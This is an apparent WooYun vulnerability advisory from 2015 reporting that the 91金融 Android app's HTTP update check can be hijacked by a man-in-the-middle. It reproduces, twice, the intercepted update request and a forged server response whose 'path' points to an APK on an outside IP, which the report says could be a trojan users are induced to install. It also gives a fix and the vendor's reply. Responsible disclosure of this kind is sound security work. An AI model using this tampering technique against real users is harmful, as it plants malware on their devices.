当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148550

漏洞标题:91金融安卓APP客户端升级过程存在缺陷可被中间人攻击利用植入木马

相关厂商:91金融

漏洞作者: 路人甲

提交时间:2015-10-22 14:23

修复时间:2016-01-20 15:00

公开时间:2016-01-20 15:00

漏洞类型:非授权访问/认证绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-22: 厂商已经确认,细节仅向厂商公开
2015-10-25: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-16: 细节向核心白帽子及相关领域专家公开
2015-12-26: 细节向普通白帽子公开
2016-01-05: 细节向实习白帽子公开
2016-01-20: 细节向公众公开

简要描述:

91金融安卓APP客户端升级过程存在缺陷,,校验过程不严格,可被中间人攻击利用植入木马

详细说明:

91金融安卓APP客户端升级过程存在缺陷,,校验过程不严格,可被中间人攻击利用植入木马
点击检查更新后
客户端发送如下数据包

POST http://au.umeng.com/api/check_app_update HTTP/1.1
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Host: au.umeng.com
Connection: Keep-Alive
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-G900F Build/KOT49H)
content=%7B%22delta%22%3Atrue%2C%22package%22%3A%22com.xzck.wallet%22%2C%22appkey%22%3A%225486b5befd98c5bfed000455%22%2C%22sdk_version%22%3A%222.4.2.20140520%22%2C%22type%22%3A%22update%22%2C%22channel%22%3A%22sanliuling%22%2C%22old_md5%22%3A%2245e25b928e96922b7a762733cf48f603%22%2C%22proto_ver%22%3A%221.4%22%2C%22idmd5%22%3A%224995cdc2664d3c8b4f981ba2934bed94%22%2C%22version_code%22%3A%2218%22%7D


使用fiddler拦截服务端返回数据,其中path可以随意指定为恶意木马,诱导用户安装
修改为

HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 21 Oct 2015 08:56:42 GMT
Content-Type: application/json;charset=utf-8
Content-Length: 607
Connection: close
{"update":"Yes","version":"3.1.0","path":"http://121.15.129.246/app/xrt-v1.0.apk","origin":"","update_log":"1. hehe test\r\n2. 首页就能搜返还咯,淘宝购物拿返还,更方便了有木有\r\n3. 大家想要的超高返分类来啦\r\n4. “我的”全新改版,资金整合,提现方便得要飞起来了\r\n5. 话费充值上线啦!价格低到广告法不让说,赶紧冲(充)啊\r\n6. 信用卡还款在路上,随时开放","proto_ver":"1.4","delta":false,"new_md5":"840f65125e7a995f27871fa5ccdb449b","size":"2504007","patch_md5":"","target_size":"2504007","display_ads":false}


用户点击确定安装apk

12.gif


漏洞证明:

91金融安卓APP客户端升级过程存在缺陷,,校验过程不严格,可被中间人攻击利用植入木马
点击检查更新后

13.gif


客户端发送如下数据包

POST http://au.umeng.com/api/check_app_update HTTP/1.1
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Host: au.umeng.com
Connection: Keep-Alive
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-G900F Build/KOT49H)
content=%7B%22delta%22%3Atrue%2C%22package%22%3A%22com.xzck.wallet%22%2C%22appkey%22%3A%225486b5befd98c5bfed000455%22%2C%22sdk_version%22%3A%222.4.2.20140520%22%2C%22type%22%3A%22update%22%2C%22channel%22%3A%22sanliuling%22%2C%22old_md5%22%3A%2245e25b928e96922b7a762733cf48f603%22%2C%22proto_ver%22%3A%221.4%22%2C%22idmd5%22%3A%224995cdc2664d3c8b4f981ba2934bed94%22%2C%22version_code%22%3A%2218%22%7D


使用fiddler拦截服务端返回数据,其中path可以随意指定为恶意木马,诱导用户安装
修改为

HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 21 Oct 2015 08:56:42 GMT
Content-Type: application/json;charset=utf-8
Content-Length: 607
Connection: close
{"update":"Yes","version":"3.1.0","path":"http://121.15.129.246/app/xrt-v1.0.apk","origin":"","update_log":"1. hehe test\r\n2. 首页就能搜返还咯,淘宝购物拿返还,更方便了有木有\r\n3. 大家想要的超高返分类来啦\r\n4. “我的”全新改版,资金整合,提现方便得要飞起来了\r\n5. 话费充值上线啦!价格低到广告法不让说,赶紧冲(充)啊\r\n6. 信用卡还款在路上,随时开放","proto_ver":"1.4","delta":false,"new_md5":"840f65125e7a995f27871fa5ccdb449b","size":"2504007","patch_md5":"","target_size":"2504007","display_ads":false}


抓包修改如下图

11.gif


用户点击确定安装apk

12.gif


修复方案:

1、修改升级协议
2、校验升级文件

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-10-22 14:58

厂商回复:

此漏洞不会对用户账户安全和资金安全造成影响,但会间接影响用户安全。

最新状态:

暂无


漏洞评价:

评价